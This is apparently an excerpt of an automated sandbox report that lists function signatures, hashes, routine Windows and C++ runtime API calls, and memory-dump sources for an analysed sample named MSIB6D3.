                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 116e10a3701e2fad807446b5870ea5f78465c55f76fab630b461feec39aefc0a
                                                                                    • Instruction ID: 8667559dc5fad40e32c5b4b0d22771497b2686d1058e351cbc540fe2c3707cb3
                                                                                    • Opcode Fuzzy Hash: 116e10a3701e2fad807446b5870ea5f78465c55f76fab630b461feec39aefc0a
                                                                                    • Instruction Fuzzy Hash: BE21CF31604A06AFBB30AF64DCA1D6A77E8FF6436071045A5FC1697150EB38ED009760
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00B36FB7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                    • API String ID: 1452528299-1781106413
                                                                                    • Opcode ID: 9b028590a0ea9677b6002038bce1c20aeb6b8b6de48d116a0dc68ec0895b518c
                                                                                    • Instruction ID: fec3458f0357acb6a52490aa4f7ca1a3eca9efcc8faf8905362585e8f51f3864
                                                                                    • Opcode Fuzzy Hash: 9b028590a0ea9677b6002038bce1c20aeb6b8b6de48d116a0dc68ec0895b518c
                                                                                    • Instruction Fuzzy Hash: 3E216F9AA5022196CB342F3C941137AB6E0EF54754F7548AFE8C9D7390FEA98C82C395
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,5D8D6CBB), ref: 00B3CD1C
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B3CD3C
                                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B3CD6D
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00B3CD86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: eb534b4e23d98d492779e9577671011509c2d97a13912a948a0a1e26c7865804
                                                                                    • Instruction ID: a49316d6119d3621a9a1be27f437ace57d547fbe3d89620dd72f3686efd4785c
                                                                                    • Opcode Fuzzy Hash: eb534b4e23d98d492779e9577671011509c2d97a13912a948a0a1e26c7865804
                                                                                    • Instruction Fuzzy Hash: BD21B171941315ABD7209F54DC09FAEBBF8FB05B14F204269F514B72D0DBB06A048BE4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B427A9
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B427B3
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42804
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42824
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 5975aefa5283dde1976d894ad7cd0110c5dd3cc43f36281568742b682c8f448b
                                                                                    • Instruction ID: 92ecc3393687b3905053d8c0340552e5cb8f425d231604264ecf097342b07911
                                                                                    • Opcode Fuzzy Hash: 5975aefa5283dde1976d894ad7cd0110c5dd3cc43f36281568742b682c8f448b
                                                                                    • Instruction Fuzzy Hash: 8401C031900215DBCB15EBA49841AAE77E1FF84720F6404C9F9146B3D2CF709F05EBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B3D7EE
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3D7F8
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3D849
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D869
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 328ff41c9517307c037f2a6fadfa9ff69d2784779b141b3b117d279ef37cef9c
                                                                                    • Instruction ID: 5fc44b82fa718bdb10cc513202c566ebee4e025642aa7704672a750204f00fe1
                                                                                    • Opcode Fuzzy Hash: 328ff41c9517307c037f2a6fadfa9ff69d2784779b141b3b117d279ef37cef9c
                                                                                    • Instruction Fuzzy Hash: 7E018036900615EBCB15FB64E8426AEB7E1EF84720F3404C9F5156B2D1DF74AE05C791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42714
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4271E
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4276F
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4278F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 09b5ff9b7a56a48c2bce083a8f20f3d66cbacee6953011748c318b376f18a516
                                                                                    • Instruction ID: 3ac454f40fa8e63c6801ffbf47be5d182830191c67db3428b8fd3f9893b2228f
                                                                                    • Opcode Fuzzy Hash: 09b5ff9b7a56a48c2bce083a8f20f3d66cbacee6953011748c318b376f18a516
                                                                                    • Instruction Fuzzy Hash: BE01AD35900215DBCB05BB648845AAEBBF1EF84710F6405C9F8146B2D2CF709F05AB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B3D759
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3D763
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3D7B4
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D7D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 136c15a0067e1642e4bd9f4ca1b9a7e1b474fe9bc263082fc81c3a1a7740d6e5
                                                                                    • Instruction ID: 8b64c912e759c960765849b7250a115601787f41e23eb17845dc38a7db2a3811
                                                                                    • Opcode Fuzzy Hash: 136c15a0067e1642e4bd9f4ca1b9a7e1b474fe9bc263082fc81c3a1a7740d6e5
                                                                                    • Instruction Fuzzy Hash: BD01CC36900219DBCB15FB64A8416AEB7E1EF80710F340889F914AB2D2CF709E08CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B428D3
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B428DD
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4292E
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4294E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: e325391969ad961affd64719736a80a91c16bcaddbab92b2663b7306596da01a
                                                                                    • Instruction ID: 8f2e9fc73fd645a46d7d760b73d87d9336505faaa6125d0d5d3e583fb23071a3
                                                                                    • Opcode Fuzzy Hash: e325391969ad961affd64719736a80a91c16bcaddbab92b2663b7306596da01a
                                                                                    • Instruction Fuzzy Hash: 3001C032900625DBCB15EB6488516BE77F1EF84720F240499F514AB2E2CF709F05EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4283E
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42848
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42899
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B428B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 0567a7998b1bc746eec0631b05122278504ddf089e7c5f930114921ef8e80a8f
                                                                                    • Instruction ID: f3173bee9a5657f800cba23c283ecd9bb4937dba92e95efafe50951619c9fe98
                                                                                    • Opcode Fuzzy Hash: 0567a7998b1bc746eec0631b05122278504ddf089e7c5f930114921ef8e80a8f
                                                                                    • Instruction Fuzzy Hash: CA01AD35D00525DBCB15EBA4C841ABE77E1BF80710F640589F414AB2D2CF709F04AB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4E974
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4E97E
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4E9CF
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4E9EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 739b8fe7885d700d8680a14ea89671a2bb4a79650e9072924e9748eb6b178a42
                                                                                    • Instruction ID: 35b7dd6027a3e99e8d6a24c353a988848a964020d188ab9cb8584e77d0751b19
                                                                                    • Opcode Fuzzy Hash: 739b8fe7885d700d8680a14ea89671a2bb4a79650e9072924e9748eb6b178a42
                                                                                    • Instruction Fuzzy Hash: E6016D31900525ABCB15AB6898416BE77E5BF84711F2505C9F5246B2E2CF709F04D791
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4EA09
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4EA13
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4EA64
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4EA84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 65fbe194043978a32c20a508d90ff7e1ce7e253bca0bec3e64a940703c83362f
                                                                                    • Instruction ID: 9d7a4f019cca701330f962580781c2f85d33f0327854a824ec7f598c8a214411
                                                                                    • Opcode Fuzzy Hash: 65fbe194043978a32c20a508d90ff7e1ce7e253bca0bec3e64a940703c83362f
                                                                                    • Instruction Fuzzy Hash: E201C031900225DBCB15FB6488456AE77E0FF84720F2A0989F4246B2D2CF70DF05DB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42BBC
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42BC6
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42C17
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42C37
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 9c4c8a6dbd791888f212a6a06e6f64f2ad2cb637608c67b1805a744560c13285
                                                                                    • Instruction ID: b2ccc556d54b639f6b53ef7b2001e54387e4339cfd04f01afbf7b1d5055dd209
                                                                                    • Opcode Fuzzy Hash: 9c4c8a6dbd791888f212a6a06e6f64f2ad2cb637608c67b1805a744560c13285
                                                                                    • Instruction Fuzzy Hash: 1801C031900619DBCB15FBA498456AEB7F0EF80710F25488AF914AB2D2CF709F04EB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4EBC8
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4EBD2
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4EC23
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4EC43
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: aa62575a405160333cfdde67650f01c2333426f679c0a9671ee6fedd9fef9eb2
                                                                                    • Instruction ID: 6aedc1e975b615af2bb5d0f8f503931faf6d390452b68c279e51ac39d1f84eb1
                                                                                    • Opcode Fuzzy Hash: aa62575a405160333cfdde67650f01c2333426f679c0a9671ee6fedd9fef9eb2
                                                                                    • Instruction Fuzzy Hash: 94016D329005259BCB15AB6498866BE77E1FF84710F2508C9F524AB2D2DF70EF059792
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42CE6
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42CF0
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42D41
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42D61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 3d09c20666495be831b7839f8f60bd3e5d1250374ab13239d0dd7b27920b320b
                                                                                    • Instruction ID: 1c1a20812df826cae544a0ad0c5484b0ac915011cc0b6ec123741984e5a5d534
                                                                                    • Opcode Fuzzy Hash: 3d09c20666495be831b7839f8f60bd3e5d1250374ab13239d0dd7b27920b320b
                                                                                    • Instruction Fuzzy Hash: B201AD31900219DBCB15BB64D841AAEB7E1AF84710F2405DAF5146B2E2CF709F05E792
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4EC5D
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B4EC67
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B4ECB8
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B4ECD8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                    • String ID:
                                                                                    • API String ID: 2854358121-0
                                                                                    • Opcode ID: 56c7bf651eba7ba990d81b9c58f8a7bb8f4309c1cef0154768b684594fe15381
                                                                                    • Instruction ID: d91f697cba5629d4386ba7f946e8204a8b828890bdcace55956e8db3f92afe05
                                                                                    • Opcode Fuzzy Hash: 56c7bf651eba7ba990d81b9c58f8a7bb8f4309c1cef0154768b684594fe15381
                                                                                    • Instruction Fuzzy Hash: DB01A932900229DBCB05AB649881AAEB7E1FF80720F250489F425AB2D2CF749F01DB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B42C51
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B42C5B
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00B38C50
                                                                                      • Part of subcall function 00B38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00B38C78
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B42CAC
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B42CCC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
